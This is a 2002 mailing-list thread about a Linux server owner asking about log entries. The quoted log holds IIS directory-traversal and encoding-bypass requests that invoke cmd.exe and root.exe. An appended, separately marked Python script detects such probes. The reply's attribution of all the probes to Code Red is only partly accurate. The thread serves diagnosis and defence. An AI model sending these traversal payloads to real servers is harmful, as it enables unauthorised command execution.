
Re: [cobalt-users] Raq4 Intrusion



Hi,
This means that someone is scanning your server to activate a Code Red
virus, which is only dangerous for a Windows system. Because you have a Linux
system, you can reject this message. You can see that someone is looking
for Code Red by the request for the program "root.exe".

Regards
Torsten

----- Original Message -----
From: <lewis.tim@xxxxxxxxxx>
To: <cobalt-users@xxxxxxxxxxxxxxx>
Sent: Thursday, February 14, 2002 11:01 AM
Subject: [cobalt-users] Raq4 Intrusion


>
> Hi
> Any ideas on nature of this intrusion:-
>  "GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"
>  "GET /MSADC/root.exe?/c+dir HTTP/1.0" 302 226 "-" "-"
>  "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
>  "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 236 "-" "-"
>  "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
>  "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 273 "-" "-"
>  "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 273 "-" "-"
>  "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 301 "-" "-"
>  "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
>  "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 645 "-" "-"
>  "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
>  "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"
>  "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>  "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"
>  "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
>  "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"
> thanks
> Lewis
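
As an added example (not part of either post in this thread), a Python triage of request lines like those in the quoted log: it percent-decodes each path until it stops changing, folds two-byte overlong UTF-8 forms such as %c0%af the way a lenient decoder would, and reports why the request looks like a probe for a Windows command binary. The sample lines are constructed from the log's patterns; the function names, reason labels and decode-round limit are assumptions.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample: request lines shaped like the quoted log, plus one benign request.
SAMPLE = [
    '"GET /scripts/root.exe?/c+dir HTTP/1.0" 302 228 "-" "-"',
    '"GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 252 "-" "-"',
    '"GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"',
    '"GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 302 253 "-" "-"',
    '"GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 215 "-" "-"',
    '"GET /index.html HTTP/1.0" 200 1024 "-" "-"',
]
REQUEST = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')
TARGETS = ("/cmd.exe", "/root.exe")  # the binaries requested in the log

def lenient_decode(path, max_rounds=3):
    """Percent-decode until stable, then fold 2-byte overlong UTF-8 (lead byte C0/C1)."""
    data, rounds = path.encode("latin-1"), 0
    while rounds < max_rounds:
        decoded = unquote_to_bytes(data)
        if decoded == data:
            break
        data, rounds = decoded, rounds + 1
    out, overlong, i = bytearray(), False, 0
    while i < len(data):
        if data[i] in (0xC0, 0xC1) and i + 1 < len(data):
            # A lenient decoder keeps the low 6 bits of the next byte without validating it.
            out.append(((data[i] & 0x1F) << 6) | (data[i + 1] & 0x3F))
            overlong, i = True, i + 2
        else:
            out.append(data[i])
            i += 1
    return out.decode("latin-1"), rounds, overlong

def classify(log_line):
    """Return the reasons a request line looks like a probe (empty list if none)."""
    match = REQUEST.search(log_line)
    if not match:
        return []
    path = match.group(1).split("?", 1)[0]
    text, rounds, overlong = lenient_decode(path)
    text = text.replace("\\", "/").lower()  # treat Windows and URL separators alike
    checks = [
        (text.endswith(TARGETS), "windows-binary"),
        ("../" in text, "traversal"),
        (rounds > 1, "double-encoding"),
        (overlong, "overlong-utf8"),
    ]
    return [label for hit, label in checks if hit]
```

Running `classify` over an access log and counting the reason labels per source address separates this kind of automated scanning from ordinary 404 noise.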